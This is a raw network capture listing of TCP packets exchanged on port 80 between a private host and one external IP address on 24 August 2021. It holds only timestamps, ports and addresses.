Aug 24, 2021 08:46:45.028815985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.028841019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.028860092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.028882027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.028904915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.028928041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.028951883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.029238939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.030955076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.032378912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033293962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033348083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033370972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033386946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033464909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033524036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033649921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.033677101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.034982920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.035681963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.053510904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053550005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053574085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053597927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053620100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053641081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053663969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.053689957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.058450937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.058499098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.058506012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.058510065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.065579891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065617085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065638065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065660000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065680981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065706968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065731049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065752983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065771103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.065776110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065814972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.065829039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.065891981 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.080682993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.080717087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.080740929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.080765009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.080790997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.080813885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.080967903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.081001043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.081206083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.081233025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.081353903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.090292931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090334892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090359926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090385914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090405941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.090410948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090434074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090440989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.090460062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090486050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090509892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090516090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.090533972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.090543032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.090590954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.103961945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104039907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104089022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104136944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104183912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104207039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104249954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.104293108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.106786966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.115470886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115670919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115761042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115819931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115845919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115879059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115906000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115930080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115953922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.115978956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.116003036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.116027117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.120227098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.139128923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139213085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139238119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139259100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139277935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139296055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139314890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.139328957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.142802000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.145021915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145059109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145081997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145102978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145123005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145143032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145164013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145181894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145204067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145226955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145248890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145267963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.145464897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.145489931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.166915894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167176008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167207003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167232037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167257071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167279959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167304039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167325974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167758942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.167768955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167797089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167819023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167841911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167864084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167886972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167908907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167934895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167958975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.167983055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.168004990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.168028116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.168991089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.191466093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191509008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191534042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191555977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191581011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191586018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.191606045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191620111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.191628933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191651106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.191710949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.191756010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.192070007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192101002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192148924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192167997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.192172050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192198038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192219973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.192219973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192245960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192261934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.192267895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192287922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192307949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192327976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192327976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.192348003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.192362070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.192409992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.215286970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215327978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215347052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215373039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215408087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215430975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215435982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.215455055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215476036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215495110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215497017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.215513945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215531111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.215579033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.215754986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215776920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215795040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.215823889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.216121912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216183901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216212034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.216265917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216283083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216308117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216326952 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.216331005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216351986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216360092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.216372967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216392994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.216434002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.216459990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.239299059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239341974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239593983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239619017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239641905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239666939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239689112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239715099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239738941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239761114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239785910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239809036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239833117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239856005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239878893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239917994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239950895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.239981890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.240015984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.240056992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.240063906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240087032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240091085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240093946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240096092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240099907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240103006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240102053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.240106106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240109921 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.240156889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.240400076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263219118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263247967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263268948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263288021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263307095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263326883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263361931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263514996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263537884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263556957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263566971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263577938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263597012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263609886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263617992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263639927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263643026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263659000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263679028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263696909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263712883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263716936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263734102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:45.263746977 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:45.263791084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.409662008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.409729004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.433372974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.433403969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.459944010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.487756014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.487801075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.511230946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.533476114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.660657883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.660703897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.683223009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.709028959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.873965025 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.894126892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.894179106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:47.918600082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:47.956705093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:48.077096939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:48.758120060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:48.758193016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:48.780690908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:48.805993080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:48.879045010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:48.982976913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:48.983051062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.005687952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066840887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066878080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066899061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066924095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066946983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066967964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.066988945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.067011118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.067023039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.067030907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.067053080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.067106009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.067133904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.091474056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092051983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092077971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092099905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092123985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092148066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092165947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092185020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092207909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092231989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092255116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092282057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092315912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092350006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092374086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092396975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092421055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.092442989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.098277092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098325014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098328114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098330975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098334074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098337889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098340988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.098342896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120548964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120588064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120610952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120631933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120652914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120677948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120699883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120699883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120719910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120742083 CEST	80	49715	212.224.105.79	192.168.2.7
